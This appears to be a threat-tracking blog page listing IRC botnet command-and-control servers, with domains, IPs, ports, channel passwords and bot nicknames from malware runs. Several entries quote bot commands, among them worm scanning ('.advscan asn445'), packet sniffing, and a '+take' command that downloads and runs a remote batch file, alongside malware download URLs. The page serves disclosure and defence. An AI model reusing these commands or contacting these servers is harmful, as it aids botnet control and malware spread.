Author: Pig

b0nkerz.com(buterfly bot)

Uncategorized

windows-pc-defender.com     208.73.210.48 1-microsoft.com     208.73.210.48 b0nkerz.com     208.73.210.48 UDP Connections Remote IP Address: 208.73.210.48 Port: 7006 Send Datagram: packet(s) of size 7 Recv Datagram: 1862 packet(s) of size 0 Remote IP Address: 208.73.210.48 Port: 7006 Send Datagram: packet(s) of size 7 Recv Datagram: 1825 packet(s) of size 0 Remote IP Address: 208.73.210.48 Port: 7006Read more...

staff.racrew.info

Uncategorized

Current Local Users: 12 Max: 602Current Global Users: 127 Max: 1021 my $server    = “staff.racrew.info”; my $port    = “7878”; my $nick    = “no”.(int(rand(99))); my $chan    = “#scan”; my $admin    = “PLaTo”; other chans #dor #scan #racrew

dalga.co.cc

Uncategorized

Server DNS ….: dalga.co.cc Server IP ……: 109.169.18.25 Server Port…..6667 Nick …………: [AUT|00|P|07591] Username ….: XP-9485 Server Pass ..: xxx Joined Channel …: #die

vs.barmy-army.net(Value,Virus,Dee bunch of lamers with big botnet estimation 30k)

Uncategorized

vs.barmy-army.net     203.141.249.71 0     127.0.0.1 www.nodrugs.kz     www.nodrugs.kz     80.92.200.94 UDP Connections Remote IP Address: 127.0.0.1 Port: 1096 Send Datagram: 93 packet(s) of size 1 Recv Datagram: 93 packet(s) of size 1 Download URLs http://80.92.200.94/images/ms.exe (www.nodrugs.kz) C&C Server: 203.141.249.71:9595 Server Password: Username: VirUs Nickname: {NOVY}[DEU][XP-SP3]393457 Channel: #Us-D33# (Password: jessica) Channeltopic: :!NAZEL http://www.nodrugs.kz/images/ms.exe ddsds.exe 1Read more...

wintalk.are.lamahs.co.cc

Uncategorized

Botnet C&C irc wintalk.are.lamahs.co.cc DNS_TYPE_A 178.32.18.248 wintalk.are.lamahs.co.cc:8080 Nick: [LN]AUS|XP|SP3|9689[00] Username: XP-4027 Joined Channel: #`ntcity`# with Password loltarded Channel Topic for Channel #`ntcity`#: “+take http://richardg.fileave.com/noeabx.bat C:WINDOWSTempsystem.bat 1” Private Message to Channel #`ntcity`#: “Leech../ File download: 0.4KB to: C:WINDOWSTempsystem.bat @ 0.4KB/sec.” Private Message to Channel #`ntcity`#: “Leech../ Created process: “C:WINDOWSTempsystem.bat”, PID: <1808>” Process Created C:WINDOWSmsshell.exe

kuwait.arabgroup.org

Uncategorized

Botnet C&C irc kuwait.arabgroup.org ip: 204.188.240.50 kuwait.arabgroup.org:5900 User Name: xrhushl Real Name: HOME-OFF-D5F0AC Nick Name: USA|XP|HOME-OFF-D5F0AC|347089 Channel: #j0ez# Channel: #w0rm# Process Created C:Documents and SettingsDaveApplication Datajuschew.exe

bbs.moiservice.com ip

Uncategorized

Botnet C&C irc gs.unicatz.com:2010bbs.moiservice.com ip: 74.117.174.82 x.leetcrew.info ip: 74.117.174.82 s.unicat.org ip: 74.117.174.82 x.leetcrew.info:16667, 2112, 2081 bbs.moiservice.com:16667, 2112, 2081 s.unicat.org :16667, 2112, 2081 Nick Name: [M][USA]XP-SP3[00]4304 Channel:#drhackers# Channel:#l# with Password: lam Channel:##S## with Password J chanel #tcp# passwd d0s Topic Deleted: :.asc asn445 100 5 0 -b -r -s Private Message Deleted BosS{{away}}!BosS@Administrator PRIVMSG #L# :.lRead more...

x.leetcrew.info

Uncategorized

Botnet C&C irc x.leetcrew.info ip: 74.117.174.82 x.leetcrew.info:16667, 2112 User Name: xbc Real Name: USA|047 Nick Name: USA|047 Name: #drhackers# Topic Deleted: :.advscan asn445 100 5 0 -b -r -s Process Created C:windowssystem32fdvphr.exe

priv.gigaservice.it(nzm botnet hosted in Hungary Budapest Atw Internet Kft)

Uncategorized

Virus Botnet C&C irc priv.gigaservice.it ip: 78.24.188.201 195.149.115.135 priv.gigaservice.it :55003 Clients: I have 919 clients and 0 servers Local users: Current Local Users: 919 Max: 1520 Global users: Current Global Users: 919 Max: 1520 NICK USA|00|XP|SP2|W|390750 USER edewggn 0 0 :USA|00|XP|SP2|W|390750 USERHOST USA|00|XP|SP2|W|390750 MODE USA|00|XP|SP2|W|390750 -xt+iB JOIN ##sodoma_3 s0dom4j03 Channel:##sodoma_3 Channel:##sodoma_3 s0dom4j03 Topic is ‘.psniffRead more...

xxblackxx.shacknet.nu

Uncategorized

Botnet C&C irc xxblackxx.shacknet.nu DNS_TYPE_A 70.39.111.203 xxblackxx.shacknet.nu:23205 Nick: {XPAUS296975} Username: pc5 Joined Channel: #Yorll@ Process Created C:DOCUME~1ADMINI~1LOCALS~1Tempservicio.exe